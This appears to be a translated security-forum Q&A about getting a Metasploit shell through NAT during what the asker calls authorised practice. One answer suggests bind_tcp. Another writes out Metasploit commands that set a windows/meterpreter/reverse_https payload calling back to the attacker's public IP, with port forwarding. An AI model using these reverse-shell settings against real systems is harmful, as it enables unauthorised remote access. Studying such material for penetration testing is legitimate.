Metasploit Obtener Shell a través de NAT

4

Ok, en primer lugar, esto es legal y lo tengo por escrito. Mi amigo y yo nos atacamos para mejorar y no violar la ley.

Configuración Tengo una imagen de VMWare ejecutando BT5R3. Utiliza el NAT de VMWare, entonces mi red está detrás de un enrutador que usa NAT. A partir de ahí estoy VPN tunelizado en el trabajo que también utiliza NAT (creo). Me he dado cuenta de que solo he ejecutado metasploit desde dentro o en un laboratorio, pero nunca a través de Internet.

Pregunta
Estoy bastante seguro de que con este escenario no sería posible una carga útil inversa, ya que requiere que la máquina se conecte nuevamente a mí. ¿Funcionará esto con cualquier carga útil?

    
pregunta Four_0h_Three 16.07.2013 - 14:54
fuente

2 respuestas

3

Esto no funcionará con las cargas útiles inversas a menos que pueda realizar el reenvío en el sistema que está NATing su tráfico. Por lo tanto, es mejor generar una carga útil que le permita conectarse a ella en lugar de una carga útil que se conecte nuevamente (pero si su objetivo también está usando NAT, entonces esto también se vuelve obsoleto). Por ejemplo:

shell/bind_tcp

Esto da problemas si hay un firewall entre usted y el objetivo. Lo mejor que se puede hacer es quitar el NAT por completo si es posible. En tu caso esto parece bastante difícil ...

    
respondido por el Lucas Kauffman 16.07.2013 - 15:14
fuente
-1

Puedes usar meterpreter/reverse_https y establecer LHOST en tu IP pública. Asegúrese de reenviar el puerto 443 a la máquina que alberga metasploit.

set payload windows/meterpreter/reverse_https
set LPORT 443
set LHOST YOUR PUBLIC IP
  

"Dado que nuestro host de atacante está detrás de NAT, tenemos que usar la IP pública   Dirección del enrutador / firewall como LHOST. Cuando el exploit es   ejecutado, esta IP se incrustará en el shellcode y cuando el   El código de shell inicial de Meterpreter se ejecuta en el destino, se conectará de nuevo   a esta dirección IP. El reenvío de puertos en nuestro enrutador / firewall   luego reenvíe el tráfico a nuestra LAN IP del host del atacante. Para esto   Por esta razón, debemos establecer LHOST en 1.1.1.1 (la IP pública de su   enrutador / cortafuegos del atacante)

     

Usar una IP pública como LHOST también significa que Metasploit intentará   vincularse a esa IP al configurar el controlador Meterpreter. Ya que   esta IP pertenece al enrutador / firewall y no a la Metasploit   ejemplo, esto obviamente va a fallar. Lo bueno es que Metasploit.   caerá automáticamente a 0.0.0.0 y básicamente servirá al   El controlador Meterpreter en todas las direcciones IP locales en el host del atacante, mientras   recordando que LHOST se configuró en nuestra dirección IP pública. Esto es   exactamente lo que necesitamos ".

Fuente: enlace

    
respondido por el Pedro Lobito 15.08.2015 - 04:37
fuente

Lea otras preguntas en las etiquetas